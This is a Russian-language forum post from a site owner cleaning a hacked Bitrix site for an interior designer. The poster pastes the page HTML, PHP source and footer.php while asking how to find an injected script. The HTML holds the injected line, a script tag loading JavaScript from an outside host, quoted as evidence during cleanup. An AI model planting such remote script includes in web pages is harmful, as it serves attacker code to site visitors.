Сайт забился вирусами и моя задача была его почистить.Все вирусы почистил кроме вот чего - когда через браузер заходишь на сайт, то если просмотреть код страницы то он естесственно будет в HTML и как раз там виден вредносный скрипт. Как найти его в php????
Примечание:
Пока чистил кучу файлов от скриптов - хоть немного разобрался.
Вирусов на сайте уже нет, только вредносная ссылка, которую я не могу найти.
Примечание:
Причина скорее всего не в дырявосте, а во взломе.
Примечание:
<script type="text/javascript">var ajaxMessages = {wait:"Загрузка..."}</script>
<script src="/bitrix/js/main/cphttprequest.js"></script>
<script src="/bitrix/components/bitrix/photogallery/templates/.default/script.js"></script>
<title>Квартирный вопрос</title>
</head><script src=http://hantoy.co.kr/product/sh_main.php ></script>
это html как вы поняли.
<?
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php");
$APPLICATION->SetPageProperty("tags", "Äèçàéí êâàðòèðû, äèçàéí äîìà, äèçàéí êîìíàòû. Äèçàéí èíòåðüåðà, ïåðåïëàíèðîâêà êâàðòèð. Ôîòî è 3D äèçàéí èíòåðüåðà êóõíè. Äèçàéí êóõíè. Äèçàéí èíòåðüåðà êâàðòèðû, Äèçàéí èíòåðüåðà äîìà. Äèçàéí êóõíè");
$APPLICATION->SetPageProperty("keywords", "äèçàéí êâàðòèðû, äèçàéí èíòåðüåðà, èíòåðüåðû êâàðòèð, äèçàéí èíòåðüåðà êóõíè, äèçàéí èíòåðüåðà êâàðòèð, äèçàéí êóõíè, èíòåðüåð êóõíè, äèçàéí èíòåðüåðà êóõíè, äèçàéí êîìíàò, äèçàéí äîìà, èíòåðüåð êîìíàòû, äèçàéí-ñòóäèÿ, â Ìîñêâå, ïåðåïëàíèðîâêà êâàðòèð, ïåðåïëàíèðîâêà, 3D, äèçàéí, äåêîðèðîâàíèå, äåêîðàòèâíàÿ îòäåëêà, êâàðòèðà, äîì, îôèñ, èíòåðüåð, ðåñòîðàí, êàôå");
$APPLICATION->SetPageProperty("description", "Ïîëíûé êîìïëåêñ óñëóã ïî îôîðìëåíèþ èíòåðüåðîâ îáùåñòâåííûõ ïîìåùåíèé: êàôå, ðåñòîðàíîâ, îôèñîâ, ãîñòèíèö; ÷àñòíûõ ïîìåùåíèé: êâàðòèð, çàãîðîäíûõ äîìîâ; âûñòàâîê: ýêñïîçèöèé, âûñòàâî÷íûõ ñòåíäîâ, îôîðìëåíèå ïðàçäíèêîâ: äíè ðîæäåíèÿ, ñâàäüáû, êîðïîðàòèâíûå âå÷åðèíêè, è ò.ä.");
$APPLICATION->SetPageProperty("title", "ALLA-DECOR.ru - Äèçàéíåð èíòåðüåðîâ ÀËËÀ ØÓÌÅÉÊÎ");
$APPLICATION->SetPageProperty("NOT_SHOW_NAV_CHAIN", "Y");
$APPLICATION->SetTitle("ALLA-DECOR.ru - Äèçàéíåð èíòåðüåðîâ ÀËËÀ ØÓÌÅÉÊÎ");
?>
<table border="0" cellspacing="1" cellpadding="1" width="100%">
<tbody>
<tr valign="top"><td>
<br />
<font size="5"><strong><font color="#6d3460">ÀËËÀ ØÓÌÅÉÊÎ</font></strong>
<br />
</font><font color="#ffffff" size="4">Äèçàéíåð èíòåðüåðîâ, äåêîðàòîð</font>
<br />
<br />
<div class="footer-box"><?$APPLICATION->IncludeComponent(
"bitrix:menu",
"bottom",
Array(
"ROOT_MENU_TYPE" => "top",
"MAX_LEVEL" => "1",
"CHILD_MENU_TYPE" => "left",
"USE_EXT" => "N"
)
);?></div>
<strong>
<p>Ïîëíûé êîìïëåêñ óñëóã ïî îôîðìëåíèþ èíòåðüåðîâ îáùåñòâåííûõ ïîìåùåíèé: êàôå, ðåñòîðàíîâ, îôèñîâ, ãîñòèíèö;</p>
<p>÷àñòíûõ ïîìåùåíèé: êâàðòèð, çàãîðîäíûõ äîìîâ;</p>
<p>âûñòàâîê: ýêñïîçèöèé, âûñòàâî÷íûõ ñòåíäîâ,</p>
<p>îôîðìëåíèå ïðàçäíèêîâ: äíè ðîæäåíèÿ, ñâàäüáû, êîðïîðàòèâíûå âå÷åðèíêè, è ò.ä.</p>
</strong>
<br />
<br />
</td><td><img align="right" src="/images/home.jpg" width="436" height="600" /> </td></tr>
</tbody>
</table>
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/footer.php");?>
ЭТО PHP
Примечание:
Трояны качал. Все коды были вставлены в конце php в виде скрипта.
Примечание:
Бекапа нет.
вот код footer.php - <?
if(defined("B_PROLOG_INCLUDED") && B_PROLOG_INCLUDED===true)
{
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/epilog.php");
}
?>